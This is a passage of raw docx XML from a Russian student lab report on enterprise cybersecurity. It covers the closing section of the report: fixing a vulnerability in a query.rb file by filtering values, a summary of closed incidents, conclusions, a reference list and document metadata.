        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Вносим изменения в код, добавляя фильтрацию значений (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-010">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 29</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-011">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 30</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), и после перезапуска веб-сервера через команду</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl restart nginx.service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">уязвимость устраняется. (Зачеркнут продублированный инцидент)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010"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="354067"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="146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1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40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Содержимое файла query.rb до исправления уязвимости</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="14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2" w:name="fig-011"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="343337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33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Содержимое файла query.rb с исправлением уязвимости</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="152"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="153"/>
    <w:bookmarkEnd w:id="154"/>
    <w:bookmarkStart w:id="163" w:name="результат"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Результат</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После выполнения всех приведенных выше действий получим, что мы закрыли все обнаруженные инциденты (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-110">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 31</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), и, соответственно, устранили уязвимости и последствия, предполагаемые этой лабораторной работой (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-111">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 32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8" w:name="fig-110"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="1995249"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="156" name="Picture"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="image/110.jpg" id="1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952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31: Закрытые инциденты</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="15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2" w:name="fig-111"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="1916489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image/111.jp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16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32: Устраненные уязвимости и последствия</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="162"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="163"/>
    <w:bookmarkEnd w:id="164"/>
    <w:bookmarkStart w:id="165" w:name="выводы"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Выводы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В ходе выполнения лабораторной работы были успешно достигнуты поставленные цели: освоены практические навыки выявления, анализа и устранения типовых уязвимостей информационной системы. В рамках сценария «Защита научно-технической информации предприятия» были обнаружены и закрыты критические уязвимости и их последствия эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="165"/>
    <w:bookmarkStart w:id="173" w:name="список-литературы"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Список литературы</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="172" w:name="refs"/>
    <w:bookmarkStart w:id="166" w:name="ref-ids-n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Сетевой сенсор системы обнаружения атак программно-аппаратный комплекс ViPNet IDS NS 3. infotecs. 321 с.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="166"/>
    <w:bookmarkStart w:id="167" w:name="ref-lab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атака "Ampire". Сценарий №5 «ЗАЩИТА НАУЧНО-ТЕХНИЧЕСКОЙ ИНФОРМАЦИИ ПРЕДПРИЯТИЯ» [Электронный ресурс]. O’Reilly Media. 24 с.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="167"/>
    <w:bookmarkStart w:id="168" w:name="ref-lazagne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The LaZagne Project [Электронный ресурс]. 2015.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="168"/>
    <w:bookmarkStart w:id="169" w:name="ref-amtip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AMTIP [Электронный ресурс].</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="169"/>
    <w:bookmarkStart w:id="170" w:name="ref-sql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CVE-2019-18890 POC (Proof of Concept) [Электронный ресурс].</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="170"/>
    <w:bookmarkStart w:id="171" w:name="ref-redmine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Redmine [Электронный ресурс].</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="171"/>
    <w:bookmarkEnd w:id="172"/>
    <w:bookmarkEnd w:id="17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7" Target="media/rId97.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId145" Target="media/rId145.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId27" Target="media/rId27.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId66" Target="media/rId66.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId53" Target="media/rId53.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId83" Target="media/rId83.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId141" Target="media/rId141.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId87" Target="media/rId87.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId106" Target="media/rId106.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId114" Target="media/rId114.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId149" Target="media/rId149.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId155" Target="media/rId155.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId159" Target="media/rId159.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId23" Target="media/rId23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31" Target="media/rId31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101" Target="media/rId101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91" Target="media/rId91.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId110" Target="media/rId110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6" Target="media/rId1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№1-С «ЗАЩИТА НАУЧНО-ТЕХНИЧЕСКОЙ ИНФОРМАЦИИ ПРЕДПРИЯТИЯ»</dc:title>
  <dc:creator>Александрова У.В.,; Волгин И.А,; Голощапов Я.В.,; Дворкина Е.В.,; Серегина И.А.</dc:creator>
  <dc:language>ru-RU</dc:language>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-02T20:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-02T20:46:00Z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rossref">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="csl">
    <vt:lpwstr>_resources/csl/gost-r-7-0-5-2008-numeric.csl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cense">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="subtitle">
    <vt:lpwstr>Кибербезопасность предприятия</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="toc-title">
    <vt:lpwstr>Содержание</vt:lpwstr>
  </property>
</Properties>
</file>